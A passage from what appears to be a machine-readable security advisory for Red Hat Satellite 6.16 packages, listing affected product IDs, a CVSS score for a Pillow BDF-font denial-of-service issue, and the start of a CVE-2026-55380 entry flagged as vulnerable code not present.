"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pillow-0:12.3.0-1.el8pc.src",
"8Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el8pc.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pillow-0:12.3.0-1.el9pc.src",
"9Base-satellite-6.16:python-pillow-debugsource-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pillow-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pillow-debuginfo-0:12.3.0-1.el9pc.x86_64",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.noarch",
"9Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el9sat.src"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16-capsule:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16-capsule:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16-capsule:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16-capsule:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el8sat.src",
"8Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el8sat.noarch",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.src",
"8Base-satellite-6.16:libsolv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-debugsource-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-demo-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:libsolv-tools-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.src",
"8Base-satellite-6.16:openvox-agent-0:8.24.1-3.el8sat.x86_64",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.noarch",
"8Base-satellite-6.16:openvox-server-0:8.14.1-1.el8sat.src",
"8Base-satellite-6.16:perl-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el8pc.src",
"8Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el8pc.src",
"8Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el8pc.src",
"8Base-satellite-6.16:python3-solv-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el8pc.noarch",
"8Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el8pc.x86_64",
"8Base-satellite-6.16:ruby-solv-debuginfo-1:0.7.20-7.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el8sat.src",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el8sat.src",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.noarch",
"8Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.src",
"8Base-satellite-6.16:rubygem-nokogiri-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debuginfo-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:rubygem-nokogiri-debugsource-0:1.15.7-3.el8sat.x86_64",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-0:6.16.12-1.el8sat.src",
"8Base-satellite-6.16:satellite-cli-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:satellite-common-0:6.16.12-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.noarch",
"8Base-satellite-6.16:scap-security-guide-satellite-0:1.0.6-1.el8sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16-capsule:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16-capsule:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16-capsule:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16-capsule:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16-capsule:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16-capsule:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16-capsule:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.src",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debuginfo-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:rubygem-nokogiri-debugsource-0:1.15.7-3.el9sat.x86_64",
"9Base-satellite-6.16-capsule:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-capsule:satellite-capsule-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-capsule:satellite-common-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16-maintenance:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-0:6.16.12-1.el9sat.src",
"9Base-satellite-6.16-utils:satellite-cli-0:6.16.12-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:foreman-installer-1:3.12.0.8-1.el9sat.src",
"9Base-satellite-6.16:foreman-installer-katello-1:3.12.0.8-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.src",
"9Base-satellite-6.16:openvox-agent-0:8.24.1-3.el9sat.x86_64",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.noarch",
"9Base-satellite-6.16:openvox-server-0:8.14.1-1.el9sat.src",
"9Base-satellite-6.16:python-pulp-container-0:2.20.10-2.el9pc.src",
"9Base-satellite-6.16:python-pyjwt-0:2.13.0-1.el9pc.src",
"9Base-satellite-6.16:python-pysequoia-0:0.1.33-1.el9pc.src",
"9Base-satellite-6.16:python3.11-pulp-container-0:2.20.10-2.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt+crypto-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pyjwt-0:2.13.0-1.el9pc.noarch",
"9Base-satellite-6.16:python3.11-pysequoia-0:0.1.33-1.el9pc.x86_64",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-faraday-0:1.10.6-1.el9sat.src",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-foreman_maintain-1:1.7.15-1.el9sat.src",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.noarch",
"9Base-satellite-6.16:rubygem-katello-0:4.14.0.21-1.el9sat.src",
